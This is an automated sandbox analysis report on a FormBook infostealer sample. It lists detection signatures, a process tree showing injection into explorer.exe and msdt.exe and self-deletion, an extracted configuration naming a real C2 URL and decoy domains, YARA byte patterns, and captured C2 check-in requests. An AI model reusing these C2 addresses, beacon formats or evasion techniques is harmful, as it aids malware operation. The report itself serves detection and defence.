Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report HkE0tD0g4NXKJfy.exe

Overview

General Information

Sample Name:HkE0tD0g4NXKJfy.exe
Analysis ID:528615
MD5:fcc2d1cda8d3989feca9c5f5f900e164
SHA1:075de723df172cc93c537d5472ad8025f192ddc8
SHA256:77e1c24ecfa1d339f61b4b8011690425fa0038b3fe32761f5ce8b3126c28c5ad
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HkE0tD0g4NXKJfy.exe (PID: 5624 cmdline: "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
    • HkE0tD0g4NXKJfy.exe (PID: 3336 cmdline: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe MD5: FCC2D1CDA8D3989FECA9C5F5F900E164)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5904 cmdline: /c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 5960

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.platinumcredit.net/sh5d/"], "decoy": ["officejava.store", "appletitan.info", "securebankofamericalog.site", "weprepareamerica-world.com", "suepersoldiers.com", "aproveiteagoras2.com", "harusan.website", "zqmm.net", "joinundergrad.com", "thefullfledged.com", "jadonzia.com", "maoshuochen.com", "tuntun-newmarket.com", "danijela-djordjevic.com", "usaonlinedocs.com", "penspanter.quest", "theclubhouse.tech", "jakital.com", "nj013.com", "foodpanda.digital", "arsels.info", "junkingcarslosangelescounty.com", "formaldressesforwomen.com", "xingruinet.ltd", "xcgtsret.com", "151motors.com", "realsteelsoftwaresending.com", "cutos2.com", "justifygomqbe.xyz", "ini91.com", "uniformfacilities.com", "bullochlifetimelegacy.com", "ddivfc.com", "tuvinoencamino.com", "nbtianzhou.com", "segmauth.com", "thelittlebookof52.com", "bellezamarket.store", "terrysboutique.store", "lightinghj.com", "malayray.com", "7routines.com", "costsma.net", "tapissier-uzes.com", "reparacion-termos-madrid.com", "combingtheratsnest.com", "bobcathntshop.com", "launchpalop.com", "gopheratms.com", "mydatingshop.com", "mosucoffee.club", "ebonyslivestockservice.online", "vupeliquid.com", "buzzsaw.club", "kg-zenith.com", "quimicosypapelesdelnte.com", "secure-mivote.com", "curatorsofkool.com", "quickipcheck.com", "ruggrunnerz.com", "magoro.com", "electricatrick.com", "coralload.com", "herhimalaya.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: HkE0tD0g4NXKJfy.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.0.HkE0tD0g4NXKJfy.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.HkE0tD0g4NXKJfy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HkE0tD0g4NXKJfy.exe, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000D.00000002.555074563.0000000004700000.00000040.00000001.sdmp, msdt.exe, 0000000D.00000002.555538878.000000000481F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49786 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 142.250.203.115:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.platinumcredit.net
          Source: C:\Windows\explorer.exeDomain query: www.thefullfledged.com
          Source: C:\Windows\explorer.exeDomain query: www.jakital.com
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.203.115 80
          Source: C:\Windows\explorer.exeDomain query: www.xcgtsret.com
          Source: C:\Windows\explorer.exeDomain query: www.suepersoldiers.com
          Source: C:\Windows\explorer.exeDomain query: www.arsels.info
          Source: C:\Windows\explorer.exeDomain query: www.electricatrick.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.219 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.204.216.132 80
          Source: C:\Windows\explorer.exeDomain query: www.151motors.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.platinumcredit.net/sh5d/
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1Host: www.platinumcredit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1Host: www.151motors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1Host: www.suepersoldiers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1Host: www.arsels.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1Host: www.electricatrick.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1Host: www.vupeliquid.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 103.224.212.219 103.224.212.219
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be73d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:14 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be75c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:09:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576c-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 14:10:15 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msdt.exe, 0000000D.00000002.550615461.0000000000453000.00000004.00000020.sdmpString found in binary or memory: http://www.jakital.com/
          Source: msdt.exe, 0000000D.00000002.550810990.0000000000475000.00000004.00000020.sdmpString found in binary or memory: http://www.jakital.com/sh5d/?Yv=deNwNK4CD/WMHHT4cYNp3s43CKigm652n7BnZRGAFJqHojdiJSlOhFJhA2qOeK3G
          Source: unknownDNS traffic detected: queries for: www.platinumcredit.net
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1Host: www.platinumcredit.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1Host: www.151motors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1Host: www.suepersoldiers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
